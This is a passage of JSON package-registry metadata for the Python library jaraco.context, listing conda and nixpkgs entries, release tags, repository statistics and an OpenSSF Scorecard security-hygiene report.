itories/jaraco%2Fjaraco.context/tags/1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1/manifests"},{"name":"1.5","sha":"df1e66e6ff30ee0622b1eb822a4d2ba1663b4ba5","kind":"commit","published_at":"2015-10-30T13:32:37.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5/manifests"},{"name":"1.4","sha":"41a57fcc069952a9925b0ac44d66317d679b8e01","kind":"commit","published_at":"2015-10-30T12:59:05.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.4","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4/manifests"},{"name":"1.3","sha":"89a04a5a4b02f92546eb2bc2bd254dabbd148359","kind":"commit","published_at":"2015-02-22T20:18:53.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.3","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3/manifests"},{"name":"1.2","sha":"a3363e1918bab3d2b260179f229706296509c1c0","kind":"commit","published_at":"2015-02-16T00:58:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2/manifests"},{"name":"1.1","sha":"115a8978616e766daace2e0cd50c5db437f3785e","kind":"commit","published_at":"2014-06-17T18:32:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1/manifests"},{"name":"1.0","sha":"d5be3e1a933b97068f31930f3eeb210895d145e9","kind":"commit","published_at":"2014-02-16T08:42:48.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0/manifests"}]},"repo_metadata_updated_at":"2026-08-06T19:26:18.682Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":55.78593443541608,"dependent_packages_count":50.742504903334265,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":53.26421966937517},"purl":"pkg:conda/jaraco.context","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/conda/jaraco.context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/conda/jaraco.context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/conda/jaraco.context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context","https://github.com/sponsors/jaraco"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/packages/jaraco.context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/packages/jaraco.context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/packages/jaraco.context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/packages/jaraco.context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/packages/jaraco.context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/packages/jaraco.context/codemeta","maintainers":[],"registry":{"name":"anaconda.org","url":"https://anaconda.org","ecosystem":"conda","default":true,"packages_count":5475,"maintainers_count":0,"namespaces_count":0,"keywords_count":3313,"github":"Anaconda","metadata":{"kind":"anaconda","key":"Main","api":"https://repo.ananconda.com","funded_packages_count":852},"icon_url":"https://github.com/Anaconda.png","created_at":"2022-10-03T15:37:08.736Z","updated_at":"2026-08-24T05:06:29.101Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/namespaces"}},{"id":13085533,"name":"python312Packages.jaraco-context","ecosystem":"nixpkgs","description":"Python module for context management","homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":["python"],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-01T18:00:43.006Z","latest_release_published_at":"2026-02-01T18:00:43.006Z","latest_release_number":"6.0.1","last_synced_at":"2026-03-08T06:19:28.128Z","created_at":"2026-02-01T18:00:42.725Z","updated_at":"2026-08-06T19:26:18.683Z","registry_url":"https://search.nixos.org/packages?channel=24.11\u0026query=python312Packages.jaraco-context","install_command":"nix-env -iA nixpkgs.python312Packages.jaraco-context","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-24.11/pkgs/development/python-modules/jaraco-context/default.nix#L36","metadata":{"nix_attribute":"python3.12-jaraco-context-6.0.1","position":"pkgs/development/python-modules/jaraco-context/default.nix:36","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin","i686-cygwin","x86_64-cygwin","aarch64-windows","x86_64-windows","i686-windows","i686-freebsd","x86_64-freebsd"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"],"upstream_ecosystem":"pypi","upstream_name":"jaraco-context","upstream_purl":"pkg:pypi/jaraco-context"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-06T19:26:18.682Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/python312Packages.jaraco-context?channel=24.11\u0026repository_url=https://channels.nixos.org/nixos-24.11","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python312Packages.jaraco-context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python312Packages.jaraco-context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python312Packages.jaraco-context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python312Packages.jaraco-context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python312Packages.jaraco-context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python312Packages.jaraco-context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python312Packages.jaraco-context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python312Packages.jaraco-context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python312Packages.jaraco-context/codemeta","maintainers":[{"uuid":"fabaff","login":null,"name":"Fabian Affolter","email":"mail@fabian-affolter.ch","url":"https://github.com/fabaff","packages_count":5052,"html_url":null,"role":null,"created_at":"2026-03-08T06:19:28.282Z","updated_at":"2026-03-08T06:19:28.282Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/maintainers/fabaff/packages"}],"registry":{"name":"nixpkgs-24.11","url":"https://channels.nixos.org/nixos-24.11","ecosystem":"nixpkgs","default":false,"packages_count":121983,"maintainers_count":3777,"namespaces_count":0,"keywords_count":739,"github":"NixOS","metadata":{"funded_packages_count":3349},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.059Z","updated_at":"2026-08-24T05:04:31.033Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/namespaces"}},{"id":12889969,"name":"python314Packages.jaraco-context","ecosystem":"nixpkgs","description":"Python module for context management","homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":["python"],"namespace":null,"versions_count":2,"first_release_published_at":"2026-01-27T07:58:26.553Z","latest_release_published_at":"2026-03-08T04:41:12.724Z","latest_release_number":"6.1.0","last_synced_at":"2026-03-08T04:41:13.050Z","created_at":"2026-01-27T07:58:26.324Z","updated_at":"2026-08-06T19:26:18.711Z","registry_url":"https://search.nixos.org/packages?channel=unstable\u0026query=python314Packages.jaraco-context","install_command":"nix-env -iA nixpkgs.python314Packages.jaraco-context","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-unstable/pkgs/development/python-modules/jaraco-context/default.nix#L38","metadata":{"nix_attribute":"python3.14-jaraco-context-6.1.0","position":"pkgs/development/python-modules/jaraco-context/default.nix:38","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","aarch64-darwin","aarch64-windows","x86_64-windows","i686-windows","i686-freebsd","x86_64-freebsd","aarch64-freebsd"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"],"upstream_ecosystem":"pypi","upstream_name":"jaraco-context","upstream_purl":"pkg:pypi/jaraco-context"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned 